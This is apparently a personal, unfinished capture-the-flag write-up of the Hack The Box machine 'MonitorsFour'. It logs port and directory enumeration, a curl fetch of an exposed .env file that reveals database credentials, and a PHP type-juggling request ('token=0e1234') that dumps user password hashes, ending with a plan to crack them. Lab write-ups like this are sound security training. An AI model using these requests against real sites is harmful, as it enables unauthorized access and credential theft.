Monitor Four | Notion

diff easy Windows

#2025-12-09

Nmap Scan enumeration

htb/machine/MonitorsFour
$ nmap -Pn -sV -sC -T4 -A 10.10.11.98
Starting Nmap 7.98 ( [<https://nmap.org>](<https://nmap.org>) ) at 2025-12-09 20:05 +0800
Nmap scan report for 10.10.11.98
Host is up (0.34s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
80/tcp   open  http    nginx
|_http-title: Did not follow redirect to [<http://monitorsfour.htb/>](<http://monitorsfour.htb/>)
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at [<https://nmap.org/submit/>](<https://nmap.org/submit/>) .
Nmap done: 1 IP address (1 host up) scanned in 68.27 seconds

htb/machine/MonitorsFour took 1m8s
$ curl -I [<http://10.10.11.98:80>](<http://10.10.11.98:80>)
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Tue, 09 Dec 2025 12:07:16 GMT
Content-Type: text/html
Content-Length: 138
Connection: keep-alive
Location: [<http://monitorsfour.htb/>](<http://monitorsfour.htb/>)

htb/machine/MonitorsFour
$ sudo nano /etc/hosts

htb/machine/MonitorsFour took 7s
$

Directory Enumeration

htb/machine/MonitorsFour took 27s
❯ dirsearch -u <http://monitorsfour.htb> -x 404
/usr/share/dirsearch/lib/core/installation.py:24: UserWarning: pkg_resources is deprecated as an API. See <https://setuptools.pypa.io/en/latest/pkg_resources.html>. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  import pkg_resources

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12293

Target: <http://monitorsfour.htb/>

[20:32:06] Scanning:
[20:32:26] 200 -    97B - /.env
[20:33:14] 403 -   548B - /admin/.htaccess
[20:33:46] 403 -   548B - /administrator/.htaccess
[20:34:03] 403 -   548B - /app/.htaccess
[20:34:38] 200 -   367B - /contact
[20:34:40] 403 -   548B - /controllers/
[20:35:33] 200 -    4KB - /login
[###############     ] 79%   9733/12293        27/s       job:1/1  errors:0

Exposed .env

htb/machine/MonitorsFour
$ curl -v "<http://monitorsfour.htb/.env>"
* Host monitorsfour.htb:80 was resolved.
* IPv6: (none)
* IPv4: 10.10.11.98
*   Trying 10.10.11.98:80...
* Established connection to monitorsfour.htb (10.10.11.98 port 80) from 10.10.14.218 port 44758
* using HTTP/1.x
> GET /.env HTTP/1.1
> Host: monitorsfour.htb
> User-Agent: curl/8.17.0
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 200 OK
< Server: nginx
< Date: Tue, 09 Dec 2025 12:36:54 GMT
< Content-Type: application/octet-stream
< Content-Length: 97
< Last-Modified: Sat, 13 Sep 2025 05:37:28 GMT
< Connection: keep-alive
< ETag: "68c50318-61"
< Accept-Ranges: bytes
<
DB_HOST=mariadb
DB_PORT=3306
DB_NAME=monitorsfour_db
DB_USER=monitorsdbuser
DB_PASS=f37p2j8f4t0r
* Connection #0 to host monitorsfour.htb:80 left intact

htb/machine/MonitorsFour
$

We got their DB creds. And also we can test even more thing on this web

Type juggling attack

tb/machine/MonitorsFour
$ curl -v "<http://monitorsfour.htb/user?token=0e1234>"
* Host monitorsfour.htb:80 was resolved.
* IPv6: (none)
* IPv4: 10.10.11.98
*   Trying 10.10.11.98:80...
* Established connection to monitorsfour.htb (10.10.11.98 port 80) from 10.10.14.218 port 58968
* using HTTP/1.x
> GET /user?token=0e1234 HTTP/1.1
> Host: monitorsfour.htb
> User-Agent: curl/8.17.0
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 200 OK
< Server: nginx
< Date: Tue, 09 Dec 2025 12:21:29 GMT
< Content-Type: text/html; charset=UTF-8
< Transfer-Encoding: chunked
< Connection: keep-alive
< X-Powered-By: PHP/8.3.27
< Set-Cookie: PHPSESSID=ea18eb1cc6039305572e0bda0950d7c7; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
<
[{"id":2,"username":"admin","email":"admin@monitorsfour.htb","password":"56b32eb43e6f15395f6c46c1c9e1cd36","role":"super user","token":"8024b78f83f102da4f","name":"Marcus Higgins","position":"System Administrator","dob":"1978-04-26","start_date":"2021-01-12","salary":"320800.00"},{"id":5,"username":"mwatson","email":"mwatson@monitorsfour.htb","password":"69196959c16b26ef00b77d82cf6eb169","role":"user","token":"0e543210987654321","name":"Michael Watson","position":"Website Administrator","dob":"1985-02-15","start_date":"2021-05-11","salary":"75000.01"},{"id":6,"username":"janderson","email":"janderson@monitorsfour.htb","password":"2a22dcf99190c322d974c8df5ba3256b","role":"user","token":"0e999999999999999","name":"Jennifer Anderson","position":"Network Engineer","dob":"1990-07-16","start_date":"2021-06-20","salary":"68000.00"},{"id":7,"username":"dthompson","email":"dthompson@monitorsfour.htb","password":"8d4a7e7fd08555133e056d9aacb1e519","role":"user","token":"0e111111111111111","name":"David Thompson","positi* Connection #0 to host monitorsfour.htb:80 left intact
on":"Database Manager","dob":"1982-11-23","start_date":"2022-09-15","salary":"83000.00"}]%
htb/machine/MonitorsFour
$

Well on the first try we got even more information.

Save the users and admin hashes into the hashes.txt to crack it